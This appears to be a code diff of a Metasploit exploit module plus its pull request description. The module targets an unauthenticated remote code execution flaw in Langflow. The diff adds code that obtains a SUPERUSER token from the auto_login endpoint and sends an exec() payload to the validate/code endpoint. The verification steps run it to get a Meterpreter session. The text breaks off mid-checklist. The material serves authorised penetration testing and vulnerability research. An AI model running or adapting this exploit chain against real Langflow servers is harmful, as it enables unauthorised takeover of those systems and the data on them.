-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'api/v1/validate/code'),
-      'headers' => { 'Content-Type' => 'application/json' },
-      'data' => {
-        'code' => "@exec(\"#{payload.encode}\")\ndef #{rand_text_alpha(6)}():\n    pass"
-      }.to_json
-    })
+    # Get SUPERUSER token
+    token = get_token
+
+    if token.empty?
+      fail_with(Failure::UnexpectedReply, 'Could not retrieve SUPERUSER API key from /api/v1/auto_login')
+    end
+
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'api/v1/validate/code'),
+        'headers' => {
+          'Content-Type' => 'application/json',
+          'Authorization' => "Bearer #{token}"
+        },
+        'data' => {
+          'code' => "@exec(\"#{payload.encode}\")\ndef #{rand_text_alpha(6)}():\n    pass"
+        }.to_json
+      }
+    )
+
     fail_with(Failure::Unknown, 'Unexpected server reply.') unless res
   end
-
 end


### PR DESCRIPTION
## Description
This pull request adds a new exploit module that exploits an unauth RCE vulnerability in Langflow versions 1.10.0 and below that allows unauthenticated attackers to chain /api/v1/auto_login (mints SUPERUSER tokens to any network caller) with /api/v1/validate/code (executes user code via exec()) to achieve full RCE on default Langflow deployments



[Addition of CVE to CISA KEV](https://www.cisa.gov/news-events/alerts/2026/08/04/cisa-adds-three-known-exploited-vulnerabilities-catalog)

**Related Issue:** 
Fixes #21752 

## Breaking Changes
None

## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/langflow_unauth_rce_cve_2026_9198`
4. Do: `run LHOST=<lhost> RHOSTS=<rhost>`
5. Do: `exploit`
6. A meterpreter session is initiated


## Test Evidence
<img width="1019" height="263" alt="image" src="https://github.com/user-attachments/assets/6312109c-28e8-419e-acf4-7decad42da29" />



## Environment

| Field | Details |
|-------|---------|
| **Operating System** | Ubuntu 22.04 |
| **Target Software/Hardware** | Langflow version 1.8.4 |


## AI Usage Disclosure
None



## Pre-Submission Checklist
- [X] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [X] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [X] Tested on the target environment specified in the Environment section above
- [X] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [X] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and 